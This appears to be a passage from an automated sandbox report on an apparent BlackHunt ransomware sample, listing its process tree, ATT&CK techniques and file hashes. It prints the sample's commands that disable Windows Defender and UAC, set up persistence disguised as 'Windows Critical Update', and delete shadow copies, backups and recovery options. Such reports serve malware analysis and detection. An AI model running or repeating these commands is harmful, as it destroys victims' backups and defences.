0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 138 PID 1920 wrote to memory of 3112 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 140 PID 1920 wrote to memory of 3112 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 140 PID 1920 wrote to memory of 1988 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 150 PID 1920 wrote to memory of 1988 1920 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe 150 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe"C:\Users\Admin\AppData\Local\Temp\0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1920 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2532
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:4516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:4656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:1088
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵
- Modifies registry class
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:5036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1136
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:5616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:3780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4984
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3628
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:2532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2172
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3112
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4420
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:5968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe" /F2⤵PID:4280
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0d5d491ac67492d617207b3e5e0368633658f5b3699e1682ad022c7894852c6f.exe" /F3⤵
- Creates scheduled task(s)
PID:6000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3508
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2588
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3320
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3700
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1864
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1548
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4960
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5020
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:544
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:776
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3540
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:932
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:3068
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5352
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2320
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5834e8228ea0c1ffd51e13a48f421046b
SHA183f9799060b855042d0b94a9013a328c71c43297
SHA2569488a67bb232dee91905c57e0417aee4252d5c478f45b4f8fff8dcfeed3420b6
SHA512ab88a3f2dc6ef5f7832fb0b368fa167bdc09035e5b7b488b4fa5bdfba802f0748f8f10d20b6f12b58d8ad545f660110a16796c9e6d40418bfa7ae67435497fcf
-
Filesize
684B
MD5ca2b5019aedf48639f5fc70e1dd09db7
SHA1c3b9e3137ba1357acdf96fec03c32ad2b4e9eebd
SHA25639c9a697e63761cc6a1d8b3787bc886c36716db1cc6cc4896fdad4c47eb65e05
SHA5125f7c3148130b52f63618c5abfbcab5d30dba5805c8ff1e46c22bc65581a7c1acebda6fd7472c87dd0d53c829af6853a54780652c3081fa3ff93de75bf8c7d077
-
Filesize
12KB
MD59d3225c39939e0d07ee4e84393ff633c
SHA11efc5f2be245f150da6ccc95ebcd84a75c6e3977
SHA2565ccab6ad9b35e8d7b9d9415a97ad1f985b3d74df4dd245911eaf47a988482df1
SHA512da29177a5a4182254c8b75dfcc66ce1dc4f7055363ad80f8eaf436948d00dd72deed84be44aa14449a9f880106e5c58f45e5655b250ae1836ffc69475a112f24